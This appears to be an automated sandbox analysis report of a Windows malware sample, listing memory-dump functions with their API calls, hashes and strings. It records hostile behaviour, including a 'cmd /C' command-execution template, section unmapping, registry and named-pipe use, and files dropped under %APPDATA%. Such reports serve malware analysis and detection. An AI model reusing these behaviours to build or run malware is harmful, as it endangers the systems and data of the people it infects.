  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
